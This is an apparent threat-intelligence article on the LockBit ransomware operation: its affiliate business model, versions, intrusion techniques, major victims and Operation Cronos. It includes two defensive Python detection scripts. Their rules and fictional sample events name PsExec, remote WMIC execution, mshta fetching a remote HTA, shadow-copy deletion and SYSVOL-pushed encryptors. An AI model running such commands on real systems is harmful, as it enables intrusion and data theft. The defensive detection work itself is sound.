# LockBit Ransomware Group
LockBit is the most prolific ransomware operation in recorded history by victim count, responsible for more than 2,000 confirmed attacks globally between 2020 and 2024. It operates as a Ransomware-as-a-Service (RaaS) platform: a core development team maintains the encryption software, the leak site, and the affiliate infrastructure, while a distributed network of criminal affiliates conducts the actual intrusions, negotiates ransoms, and deploys the encryptor. The affiliates keep 75 to 80 percent of collected ransom payments. The core team keeps the rest.
This structure matters for defenders. LockBit is not a hacker group that also builds ransomware. It is a software company that also runs a criminal enterprise. The distinction changes how you analyze their behavior. Core developers manage product versioning, run a bug bounty program, keep their negotiation and leak infrastructure online, and market to prospective affiliates. Affiliates are independent operators who choose LockBit from a competitive RaaS marketplace based on reliability, encryptor quality, and revenue share.
Understanding LockBit through the lens of a product business with an affiliate distribution channel is more accurate than treating it as a single threat actor. The implication for defenders is significant: shutting down the core developers does not shut down the affiliates, who carry portable skills and can migrate to other RaaS platforms. Operation Cronos in February 2024 proved this point.
In the Planetary Defense Model, LockBit operates as a Beast in the most literal sense: a predator that reaches the geological core (DPS) and holds the data hostage. But the entry points are in the outer layers, and no single domain stops it. Defending against LockBit requires all four inner domains working simultaneously.
LockBit recruits affiliates on criminal forums and through reputation. Prospective affiliates are vetted (in their own criminal fashion), given access to the affiliate panel, and can begin conducting attacks using LockBit infrastructure. The panel provides: the encryptor binary, a customizable ransom note, access to the leak site (hosted on the dark web), negotiation chat infrastructure, and technical support.
LockBit ran a formal bug bounty program for their own malware, paying researchers to identify flaws in LockBit code. This is organized crime with software product management practices. They published rules for affiliates, including prohibitions on attacking hospitals in certain jurisdictions (a prohibition that many affiliates ignored) and restrictions on targets in former Soviet states.
The double extortion model is standard: affiliates exfiltrate data before encrypting it, then threaten to publish on the leak site unless the ransom is paid. This creates two independent ransoms (pay to decrypt, pay to prevent publication) and ensures that even organizations with functional backups face pressure to pay.
LockBit 1.0 (ABCD variant, 2019-2020). The initial version, named for the .abcd file extension appended to encrypted files. Limited distribution, largely manual operations.
LockBit 2.0 (2021). The version that made LockBit dominant. Added StealBit, a custom data exfiltration tool built for speed, capable of pushing large volumes of data out of a network in minutes. Automated much of the lateral movement process. Added automated propagation through Active Directory Group Policy: with domain admin credentials in hand, the affiliate creates a GPO that runs the encryptor on every domain-joined machine. This is not an exploit of a vulnerability; it is abuse of a legitimate administrative feature, which is why it is hard to block without breaking administration. This version established LockBit as the most active RaaS by posted victim count.
LockBit 3.0 / LockBit Black (June 2022). Incorporated code from BlackMatter and DarkSide, two predecessor RaaS operations that had been shut down. Added anti-analysis features and a modular architecture, and introduced the bug bounty program. Ransom note naming conventions shifted across versions and affiliate customization. The 3.0 builder leaked in September 2022, so encryptors compiled from it also turn up in intrusions by groups with no LockBit affiliation; a "LockBit" detection is not by itself attribution.
LockBit Green (2023). Built partially on the leaked Conti ransomware source code. Deployed by a subset of affiliates against specific targets.
LockBit affiliates use three primary initial access vectors, all of which represent exploitable gaps in the outer PDM domains.
VPN and Remote Access Exploitation. The most common entry point. Affiliates exploit known vulnerabilities in enterprise VPN and remote access products. High-profile examples include Citrix Bleed (CVE-2023-4966, a memory disclosure bug in Citrix NetScaler ADC and Gateway that leaks session tokens, letting an attacker replay an authenticated session and bypass MFA), Ivanti Connect Secure vulnerabilities, and FortiGate firewall exploits. All of these had patches available; exploitation continued against organizations that had not applied them. Patching alone is not always enough: after Citrix Bleed, an attacker who already holds a stolen session token keeps access until active sessions are terminated. Organizations running unpatched remote access infrastructure are providing direct, unauthenticated entry to affiliates.
RDP Compromise. Affiliates purchase access to exposed RDP servers through initial access broker markets, brute force weak credentials, or reuse credentials obtained in prior breaches. RDP exposed to the internet without MFA is a reliable entry path.
Phishing. Email-based initial access, typically delivering a loader that retrieves a Cobalt Strike beacon or another post-exploitation framework for hands-on-keyboard operations.
After initial access, affiliate operations follow a consistent pattern. Cobalt Strike beacons provide post-exploitation capability. PsExec and Windows Management Instrumentation (WMI) handle lateral movement across the environment. StealBit handles data exfiltration, typically to affiliate-controlled cloud storage. Living-off-the-land binaries (LOLBins) including wmic and mshta blend with legitimate administrative activity.
When affiliates have reached sufficient coverage of the environment, they deploy the LockBit encryptor via group policy, scheduled tasks, or direct execution. Files are encrypted with extensions including .lockbit (2.0) and various custom extensions configurable per affiliate deployment. Ransom notes are dropped in every encrypted directory.
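The post-intrusion sequence above (remote execution with PsExec and WMI, LOLBin abuse, then encryptor deployment through Group Policy or scheduled tasks) is detectable as a sequence even when each step on its own looks like administration. What follows is an added example written for this article, not LockBit code and not the page author's tooling: it runs two correlations over constructed Sysmon-style process-creation events, one per-host (two or more distinct stages within a window) and one fleet-wide (the same binary executing from a UNC path on many hosts within minutes). The event schema, hostnames, paths, TEST-NET addresses, regular expressions and thresholds are assumptions and starting points, not tuned values.

```python
"""Stage-sequence detection for LockBit-affiliate post-exploitation activity.

Added example, not code from the page or from LockBit: correlates
Sysmon-style process-creation events (constructed below) into the stages the
text describes (remote execution via PsExec/WMI, LOLBin abuse, encryptor
deployment via scheduled task / Group Policy). Field names, hostnames, paths
and thresholds are assumptions; tune the patterns to your own telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each pattern is matched against "<image basename> <arguments>", lower-cased.
STAGE_RULES = {
    "lateral_movement": [
        re.compile(r"^psexec(64)?\.exe .*\\\\"),                    # PsExec against a UNC target
        re.compile(r"^psexesvc\.exe"),                               # PsExec service landing on the target
        re.compile(r"^wmic\.exe .*/node:.*process call create"),   # remote process creation over WMI
    ],
    "lolbin_execution": [
        re.compile(r"^mshta\.exe .*https?://"),                     # mshta pulling a remote HTA
        re.compile(r"^wmic\.exe .*shadowcopy delete"),              # shadow copy deletion before encryption
    ],
    "encryptor_deployment": [
        re.compile(r"^schtasks\.exe .*/create .*\\\\"),            # scheduled task running a payload from a share
        re.compile(r"^gpupdate\.exe .*/force"),                     # forced refresh after a malicious GPO is linked
    ],
}

# Constructed sample telemetry; hosts, users, IPs (TEST-NET ranges) and paths are fictional.
EVENTS = [
    {"ts": "2024-03-01T02:10:00", "host": "WS-014", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://198.51.100.7/update.hta"},
    {"ts": "2024-03-01T02:41:00", "host": "WS-014", "user": r"CORP\svc_backup",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic.exe /node:"FS-02" /user:CORP\svc_backup process call create "cmd.exe /c whoami"'},
    {"ts": "2024-03-01T03:05:00", "host": "WS-014", "user": r"CORP\svc_backup",
     "image": r"C:\Tools\PsExec64.exe",
     "cmdline": r'PsExec64.exe \\DC-01 -s -d cmd.exe /c "gpupdate /force"'},
    # A lone gpupdate by an admin: one stage only, must not alert by itself.
    {"ts": "2024-03-01T04:00:00", "host": "HR-PRINT-01", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\gpupdate.exe", "cmdline": r"gpupdate.exe /force"},
    # The same binary from SYSVOL executing on many hosts within minutes: GPO push of the encryptor.
    *[{"ts": ts, "host": host, "user": r"NT AUTHORITY\SYSTEM",
       "image": r"\\corp.local\SYSVOL\corp.local\scripts\lb.exe", "cmdline": "lb.exe"}
      for ts, host in [("2024-03-01T04:30:00", "FS-02"), ("2024-03-01T04:31:00", "FS-03"),
                       ("2024-03-01T04:31:00", "WS-014"), ("2024-03-01T04:32:00", "HR-PRINT-01")]],
]


def parse_ts(s):
    return datetime.fromisoformat(s)


def classify(event):
    """Return the list of stage names whose patterns match this process event."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    args = cmd.split(" ", 1)[1].lower() if " " in cmd else ""
    text = f"{exe} {args}"
    return [stage for stage, pats in STAGE_RULES.items() if any(p.search(text) for p in pats)]


def correlate_by_host(events, window=timedelta(hours=2)):
    """Hosts on which at least two distinct stages occur within `window`.

    Returns {host: sorted stage names}. A single stage (one gpupdate) is noise;
    two or more in sequence on one host is the affiliate pattern.
    """
    hits = defaultdict(list)
    for ev in events:
        for stage in classify(ev):
            hits[ev["host"]].append((parse_ts(ev["ts"]), stage))
    alerts = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            stages = {s for t, s in seen[i:] if t - t0 <= window}
            if len(stages) >= 2:
                alerts[host] = sorted(stages)
                break
    return alerts


def detect_mass_deployment(events, min_hosts=3, window=timedelta(minutes=15)):
    """Flag an image run from a UNC path on >= min_hosts distinct hosts within `window`.

    This is the fleet-wide signature of an encryptor pushed by Group Policy or a
    scheduled task, independent of the binary's name or hash.
    """
    runs = defaultdict(list)
    for ev in events:
        image = ev["image"].lower()
        if image.startswith("\\\\"):
            runs[image].append((parse_ts(ev["ts"]), ev["host"]))
    flagged = {}
    for image, seen in runs.items():
        seen.sort()
        for i, (t0, _) in enumerate(seen):
            hosts = {h for t, h in seen[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                flagged[image] = sorted(hosts)
                break
    return flagged


if __name__ == "__main__":
    for host, stages in correlate_by_host(EVENTS).items():
        print(f"[host-sequence] {host}: {', '.join(stages)}")
    for image, hosts in detect_mass_deployment(EVENTS).items():
        print(f"[mass-deploy] {image} ran on {len(hosts)} hosts: {', '.join(hosts)}")
```

Two design points are worth keeping when you adapt this. The per-host rule tolerates a lone `gpupdate /force` because administrators run it constantly; it fires on WS-014 only because the mshta download and the remote execution land on the same host within the window. The mass-deployment rule keys on the execution path, not a hash or filename, because the affiliate controls both of those and the SYSVOL-to-everywhere fan-out is the part they cannot change.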
Boeing (October 2023). LockBit posted approximately 43 GB of Boeing data to their leak site after Boeing declined to pay. The breach affected Boeing's global services division.
ICBC (November 2023). ICBC Financial Services, the U.S. broker-dealer arm of the Industrial and Commercial Bank of China, the world's largest bank by assets, suffered a LockBit attack that disrupted U.S. Treasury market settlement operations. Trades had to be settled manually through alternative channels. The systemic risk implications of a ransomware attack disrupting U.S. Treasury settlement attracted significant regulatory attention.
Royal Mail (January 2023). The UK national postal service suffered weeks of disruption to international shipping operations. Royal Mail refused to pay the ransom, and LockBit published negotiation transcripts along with stolen data.
Healthcare targets. LockBit affiliates repeatedly attacked hospitals and healthcare systems despite the core group's stated prohibition, demonstrating that affiliate behavior is not reliably controlled by the platform operator.
Operation Cronos (February 2024) was a coordinated international law enforcement action led by the UK's National Crime Agency (NCA) with participation from Europol, the FBI, the U.S. Department of Justice, and agencies from nine other countries. The operation seized LockBit's leak site infrastructure, obtained decryption keys for some victims, de-anonymized affiliate identities, and led to the arrest of several operators. In May 2024, as a follow-on to the operation, the DOJ unsealed an indictment of LockBit's primary developer, identified as Dmitry Yuryevich Khoroshev of Russia, and the U.S. State Department offered a reward of up to $10 million for information leading to his arrest.
LockBit rebuilt within days. The core infrastructure was replaced, a new leak site appeared, and affiliate operations resumed. The lesson is not that law enforcement action is ineffective. It is that a RaaS operation with distributed affiliates, anonymous cryptocurrency payments, and global infrastructure is architecturally resilient to law enforcement disruption in ways that a traditional criminal organization is not. Operation Cronos slowed LockBit's activity, burned its reputation with affiliates, and disrupted specific operators. It did not stop the platform.
The most important thing to understand about LockBit is that no single defensive control stops it. Organizations that focus exclusively on backup recovery miss the double extortion dynamic. Organizations that focus on endpoint detection miss the initial access through unpatched VPN. Organizations that focus on patching miss the credential-based RDP access. LockBit wins against single-domain defenses.
This is why a framework like the PDM is operationally more useful than a checklist approach. The PDM reveals that stopping LockBit requires simultaneous coverage across multiple domains. DPS (Data Protection and Sovereignty) addresses the backup problem: immutable, air-gapped recovery capability makes the encryption payload a degradation event rather than a catastrophic failure. VSD (Vulnerability and Surface Defense) addresses the initial access problem: patched VPN infrastructure and no exposed RDP close the most common entry paths. IAT (Identity Access and Trust) addresses the lateral movement problem: MFA on remote access and privileged account controls limit blast radius after initial compromise. TID (Threat Intelligence and Defense) addresses the detection problem: Cobalt Strike behavioral signatures, StealBit exfiltration patterns, and LOLBin abuse sequences are detectable before encryption begins if the TID layer is calibrated for RaaS affiliate behavior.
The ICBC attack introduced a dimension that most ransomware discussions ignore: critical infrastructure systemic risk. When a ransomware attack on a single bank disrupts U.S. Treasury market settlement, the question shifts from "how does this organization recover" to "what does ransomware resilience look like at a systemic level." Regulators noticed. DORA in the EU and the SEC cybersecurity disclosure rules in the U.S. were adopted before the ICBC incident, but ICBC is exactly the scenario they were written for: enterprise ransomware treated as a financial stability issue, not just an IT recovery issue.
The most persistent misconception in ransomware preparedness is that strong backups eliminate ransomware risk. LockBit's double extortion model makes this false. An organization can restore from backups and still face a demand to pay for the suppression of stolen data. For organizations in regulated industries, the threatened publication of customer data, health records, or financial information creates independent liability beyond the operational disruption.
Genuine ransomware resilience requires both recovery capability (DPS: immutable backups) and exfiltration prevention (DPS: data classification and encryption at rest so stolen data is not usable; TID: detection of exfiltration activity before the volume of stolen data becomes damaging). One caveat on encryption at rest: it only helps when the attacker does not hold the keys. An affiliate operating as a domain admin on the file server reads the data in the clear, so the controls that actually blunt double extortion are limiting which identities and systems can read bulk data, and noticing when bulk reads and bulk egress happen.
In the Planetary Defense Model, LockBit represents the scenario where a Beast reaches the geological core (DPS) and holds the data hostage. The Beast enters through gaps in VSD (unpatched surfaces), traverses terrain via SPH weaknesses (poor endpoint controls, LOLBin visibility gaps), moves laterally through IAT gaps (insufficient MFA on remote access, weak privileged account controls), and exfiltrates before TID detection occurs.
No single CDA methodology stops LockBit alone. This is intentional architecture, not a limitation. The PDM's concentric model means all six domains operate simultaneously, and LockBit specifically exploits the gaps between domains that organizations treat as separate programs.
CDA's Sovereign Data Protocol (SDP, DPS domain) addresses the backup problem directly: immutable, tested recovery capability means the encryption payload loses its leverage. The encryptor becomes a recovery drill, not an existential event. SDP also addresses exfiltrated data usability: data classified and encrypted at rest does not become useful to an attacker who exfiltrates it.
CDA's Continuous Surface Reduction (CSR, VSD domain) addresses the initial access problem. Citrix Bleed, Ivanti exploits, and FortiGate vulnerabilities all had patches available before affiliates exploited them at scale. Continuous surface reduction means the exploitable window closes faster than affiliates can operationalize new CVEs. Attack surface management that includes external-facing remote access infrastructure catches exposed RDP before initial access brokers do.
CDA's Zero Possession Architecture (ZPA, IAT domain) addresses the lateral movement problem: MFA on remote access, privileged account controls, and session management that limits blast radius after initial access. An affiliate who compromises one endpoint in a ZPA-compliant environment faces hard barriers to lateral movement. In environments without ZPA controls, lateral movement to domain controllers is often a matter of hours.
CDA's Predictive Defense Intelligence (PDI, TID domain) addresses the detection problem. Cobalt Strike behavioral signatures, StealBit exfiltration patterns (high-volume FTP or HTTP transfers to unusual destinations), and LOLBin abuse sequences (wmic, psexec, mshta in unusual combinations) are detectable before the encryption phase if the TID layer is calibrated for RaaS affiliate behavior patterns.
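The StealBit pattern described above (a large volume leaving one host in a short time, bound for a destination that host never otherwise talks to) can be caught from flow or proxy logs without any signature for the tool itself. The following is an added example for this article, not code from LockBit, the page author, or any product: it builds a per-host baseline of external destinations and peak hourly egress from constructed flow records, then scores the current hour against it. Field names, hostnames, the TEST-NET addresses, the RFC 1918 internal ranges and the thresholds are assumptions; replace them with your own addressing and a baseline window long enough to cover normal backup and sync jobs.

```python
"""Egress-volume detection for StealBit-style bulk exfiltration.

Added example, not code from the page, LockBit, or any vendor: builds a
per-host baseline of external destinations and peak hourly egress from
constructed flow records, then flags hourly transfers that are large and/or
bound for a destination the host has never reached. Field names, hosts,
IPs (TEST-NET ranges), internal ranges and thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

MIB = 2 ** 20
GIB = 2 ** 30

# Assumption: RFC 1918 space is "inside"; everything else is egress. Match this to
# your real addressing, including any cloud VPC ranges and ZTNA/proxy exits.
INTERNAL_RANGES = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_RANGES)


def hour_bucket(ts):
    return datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)


def build_baseline(flows):
    """Per host: the external destinations it normally reaches and its peak hourly egress."""
    known = defaultdict(set)
    hourly = defaultdict(lambda: defaultdict(int))
    for f in flows:
        if is_external(f["dst"]):
            known[f["src"]].add(f["dst"])
            hourly[f["src"]][hour_bucket(f["ts"])] += f["bytes_out"]
    return {h: {"known_dsts": known[h], "peak_hour_bytes": max(hourly[h].values())} for h in known}


def detect_exfil(flows, baseline, min_bytes=1 * GIB, ratio=10, new_dst_floor=64 * MIB):
    """Score each (host, destination, hour) of external egress against the baseline.

    high:   volume above max(min_bytes, ratio * host peak), whatever the destination
    medium: a never-seen destination receiving more than max(ratio * host peak, new_dst_floor)
    """
    agg = defaultdict(int)
    for f in flows:
        if is_external(f["dst"]):
            agg[(f["src"], f["dst"], hour_bucket(f["ts"]))] += f["bytes_out"]
    alerts = []
    for (src, dst, hour), total in sorted(agg.items()):
        base = baseline.get(src, {"known_dsts": set(), "peak_hour_bytes": 0})
        peak = base["peak_hour_bytes"]
        new_dst = dst not in base["known_dsts"]
        if total > max(min_bytes, ratio * peak):
            severity = "high"
        elif new_dst and total > max(ratio * peak, new_dst_floor):
            severity = "medium"
        else:
            continue
        alerts.append({"src": src, "dst": dst, "hour": hour.isoformat(), "bytes_out": total,
                       "new_destination": new_dst, "severity": severity,
                       "detail": f"{total / MIB:.0f} MiB out; baseline peak {peak / MIB:.0f} MiB/h"})
    return alerts


# Constructed flow records. A prior period of normal traffic ...
BASELINE_FLOWS = [
    {"ts": "2024-02-22T09:15:00", "src": "FS-02", "dst": "203.0.113.10", "dport": 443, "bytes_out": 30 * MIB},
    {"ts": "2024-02-22T09:40:00", "src": "FS-02", "dst": "203.0.113.10", "dport": 443, "bytes_out": 30 * MIB},
    {"ts": "2024-02-22T14:05:00", "src": "FS-02", "dst": "203.0.113.10", "dport": 443, "bytes_out": 45 * MIB},
    {"ts": "2024-02-22T10:00:00", "src": "WS-014", "dst": "203.0.113.10", "dport": 443, "bytes_out": 5 * MIB},
    {"ts": "2024-02-22T22:00:00", "src": "FS-02", "dst": "10.0.0.5", "dport": 445, "bytes_out": 2 * GIB},  # internal, ignored
]
# ... and the hour in which an affiliate drains the file server.
CURRENT_FLOWS = [
    {"ts": "2024-03-01T03:05:00", "src": "FS-02", "dst": "198.51.100.23", "dport": 443, "bytes_out": 3 * GIB},
    {"ts": "2024-03-01T03:20:00", "src": "FS-02", "dst": "198.51.100.23", "dport": 443, "bytes_out": 3 * GIB},
    {"ts": "2024-03-01T03:40:00", "src": "FS-02", "dst": "198.51.100.23", "dport": 443, "bytes_out": 2 * GIB},
    {"ts": "2024-03-01T03:10:00", "src": "WS-014", "dst": "203.0.113.10", "dport": 443, "bytes_out": 40 * MIB},  # normal
    {"ts": "2024-03-01T03:12:00", "src": "HR-PRINT-01", "dst": "198.51.100.23", "dport": 443, "bytes_out": 150 * MIB},
    {"ts": "2024-03-01T03:00:00", "src": "FS-02", "dst": "10.0.0.5", "dport": 445, "bytes_out": 4 * GIB},  # staging, not egress
]

if __name__ == "__main__":
    for a in detect_exfil(CURRENT_FLOWS, build_baseline(BASELINE_FLOWS)):
        print(f"[{a['severity']}] {a['src']} -> {a['dst']} at {a['hour']}: {a['detail']}")
```

The medium tier exists because an affiliate who throttles below the volume threshold still shows up as a new destination from a host with no history of reaching it; the internal 4 GiB copy to 10.0.0.5 is deliberately ignored here because staging to an internal host is a file-server access question, not an egress one. The blind spot to be aware of is exfiltration to a destination the host already uses legitimately (a sanctioned cloud storage provider); that case needs identity or DLP context rather than volume alone.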
The Planetary Crisis Protocol (PCP) coordinates the response when LockBit does breach: data containment (DPS), vulnerability remediation (VSD), system recovery (SPH), credential rotation (IAT), threat eviction (TID), and regulatory notification (RGA) operating simultaneously rather than sequentially.
CISA, FBI, MS-ISAC. "Understanding Ransomware Threat Actors: LockBit." Joint Cybersecurity Advisory AA23-165A, June 2023. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a
U.S. Department of Justice. "U.S. and U.K. Disrupt LockBit Ransomware Variant." DOJ Press Release, February 2024. https://www.justice.gov/opa/pr/us-and-uk-disrupt-lockbit-ransomware-variant
Europol. "Law Enforcement Disrupt World's Biggest Ransomware Operation." Europol Press Release, February 2024.
MITRE ATT&CK. "LockBit Software." MITRE ATT&CK S0532. https://attack.mitre.org/software/S0532/
Trend Micro Research. "LockBit 3.0 (LockBit Black) Ransomware." Trend Micro Research, 2022.
Written by Evan Morgan